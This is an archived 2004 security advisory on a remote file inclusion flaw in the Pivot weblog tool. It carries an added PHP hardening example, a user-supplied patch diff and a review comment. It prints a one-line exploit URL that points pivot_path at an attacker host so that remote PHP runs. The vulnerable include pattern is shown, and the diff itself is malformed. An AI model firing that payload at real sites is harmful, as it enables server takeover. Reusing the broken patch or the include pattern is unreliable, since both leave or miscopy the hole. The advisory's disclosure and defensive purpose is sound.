ID SECURITYVULNS:DOC:6366 Type securityvulns Reporter Securityvulns Modified 2004-06-18T00:00:00
Description
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web
site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
Pivot Remote Code Execution Vulnerability
SUMMARY
"Pivot (http://www.pivotlog.net/) is a web-based tool to help you
maintain dynamic sites, like weblogs or online journals. Pivot is released
under the GPL so it is completely free to use. It is written in PHP, and
does not require additional libraries or databases to function".
Remote code execution is possible in Pivot through remote file inclusion.
Malicious PHP code fetched from an attacker-controlled host is executed with
the privileges of the user account that runs the PHP scripts for Pivot.
DETAILS
Vulnerable Systems:
* Pivot version 1.10
Immune Systems:
* Pivot version 1.14
The vulnerability lies in the class file module_db.php, which can be
requested directly from the web server. By supplying a forged path, an
attacker can make the script include any file, including one that contains
malicious PHP code. That code runs in the context of the user that normally
runs the Pivot scripts. The relevant excerpt is shown below:
// for now, we'll just use the xml / flat-file module..
include_once $pivot_path."modules/module_db_xml.php";
class db {
module_db.php performs no validation or filtering at all; it assumes it is
only included from known locations where $pivot_path has already been set to
a well-formed value. However, the file can also be requested directly. These
two factors together give rise to the security issue.
The intended design is that module_db.php is included from elsewhere in the
code, after $pivot_path has been set. However, if register_globals is On in
php.ini, request parameters become global variables before the script runs,
so an attacker can supply $pivot_path and point it at a host under their
control. Because the include concatenates $pivot_path with
"modules/module_db_xml.php", the attacker's server only has to serve a PHP
file at that relative path (for example
http://xxxxx/modules/module_db_xml.php). Including a URL also requires
allow_url_fopen to be enabled, which is the PHP default.
A simple way to exploit the vulnerability might look something along the
lines of:
http://xxxxx/pivot/modules/module_db.php?pivot_path=http://xxxxxx
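As an added illustration (this is not Pivot's code, nor the reporter's patch), the following shows the include pattern from module_db.php beside a hardened form that refuses direct requests, derives the module directory from the file's own location and allowlists the module name. The function names, the PIVOT_ENTRY constant and the attacker.example host are assumptions made for the example. Because register_globals no longer exists in current PHP, the CLI demonstration at the bottom reproduces its effect with extract() on a constructed request.

```php
<?php
// Added example, not Pivot's code: the include pattern from module_db.php
// beside a hardened form. Function names, the PIVOT_ENTRY constant and the
// request values below are illustrative assumptions.

// --- Vulnerable pattern -------------------------------------------------
// module_db.php concatenated an unchecked global with a fixed file name.
// With register_globals=On, ?pivot_path=http://attacker.example/ sets the
// global before this line runs, and PHP fetches and executes
// http://attacker.example/modules/module_db_xml.php (allow_url_fopen=On on
// PHP 4; allow_url_include=On on PHP 5.2 and later).
function vulnerable_include_path($pivot_path)
{
    return $pivot_path . "modules/module_db_xml.php";
}

// --- Hardened pattern ---------------------------------------------------
// The base directory comes from the file's own location, the module name
// must be on an allowlist, and the resolved path must stay inside the
// install tree. Returns the absolute path or false.
function safe_module_path($base_dir, $module)
{
    static $allowed = array('module_db_xml.php');
    if (!in_array($module, $allowed, true)) {
        return false;
    }
    $root      = realpath($base_dir);
    $candidate = realpath($base_dir . DIRECTORY_SEPARATOR . 'modules'
                          . DIRECTORY_SEPARATOR . $module);
    if ($root === false || $candidate === false) {
        return false;           // missing file, a URL, or ../ escaped the tree
    }
    // realpath() resolves ../ and symlinks, so a prefix check is sufficient.
    return strpos($candidate, $root . DIRECTORY_SEPARATOR) === 0 ? $candidate : false;
}

// Guard that belongs at the top of module_db.php: only an entry script that
// defines PIVOT_ENTRY may include this file, so a direct request is refused
// before any include runs.
function refuse_direct_access()
{
    if (!defined('PIVOT_ENTRY')) {
        if (!headers_sent()) {
            header('HTTP/1.0 403 Forbidden');
        }
        exit("module_db.php cannot be requested directly\n");
    }
}

// Defence in depth: collect the interpreter settings that make this class
// of bug exploitable, so the application can log or refuse to start.
function report_unsafe_ini()
{
    $warnings = array();
    foreach (array('register_globals', 'allow_url_fopen', 'allow_url_include') as $opt) {
        $value = ini_get($opt);             // false when the option no longer exists
        if ($value !== false && $value !== '' && $value !== '0'
            && strtolower($value) !== 'off') {
            $warnings[] = $opt . '=' . $value;
        }
    }
    return $warnings;
}

// --- Demonstration (CLI) -----------------------------------------------
// extract() reproduces what register_globals did with a constructed request.
if (PHP_SAPI === 'cli') {
    $_GET = array('pivot_path' => 'http://attacker.example/');   // constructed request
    extract($_GET);                                               // register_globals effect
    echo "vulnerable include target: " . vulnerable_include_path($pivot_path) . "\n";

    $base = dirname(__FILE__);
    var_dump(safe_module_path($base, $pivot_path));           // rejected by the allowlist
    var_dump(safe_module_path($base, '../../etc/passwd'));     // rejected by the allowlist
    var_dump(safe_module_path($base, 'module_db_xml.php'));   // accepted only if the file exists under modules/
    var_dump(report_unsafe_ini());
}
```

Run it with the PHP CLI. The guard that matters most is refusing direct access; the allowlist and the realpath() prefix check then cover both remote URLs (realpath() never resolves a URL to a file) and ../ traversal, regardless of how $pivot_path was populated.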
Patch Availability:
A new version of Pivot is available for download, and users are strongly
advised to upgrade. Those who for some reason cannot upgrade can apply the
following fix instead:
--- module_db.php Wed Feb 11 16:29:04 2004
+++ module_db.phpfix Fri May 28 22:36:07 2004
@@ -10,6 +10,10 @@
// Patch to fix remote include - loofus (0x90)
//
+/ Make sure user cannot include remote files /
+if(isset($_GET['pivot_path']) || isset($_POST['pivot_path']) ||
isset($_COOKIE['pivot_path']))
+ die("No remote include for you!\n");
+
// for now, we'll just use the xml / flat-file module..
include_once $pivot_path."modules/module_db_xml.php";
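Review bot: the guard added at the top of the hunk only denies $pivot_path when it arrives via $_GET, $_POST or $_COOKIE, so it is a denylist of input sources rather than a fix of the root cause: module_db.php can still be requested directly and still includes whatever $pivot_path holds at that moment. Prefer refusing direct access outright (for example, die() unless a constant that only the real entry script defines is set) and deriving the include path from the file's own location instead of a global. Separately, the hunk as shown will not apply cleanly: the comment line `+/ Make sure user cannot include remote files /` has lost its `/*` and `*/` delimiters, and the wrapped continuation `isset($_COOKIE['pivot_path']))` lacks the leading `+`, so a patch tool would look for it as context in the original file and fail.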
ADDITIONAL INFORMATION
The information has been provided by loofus.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages.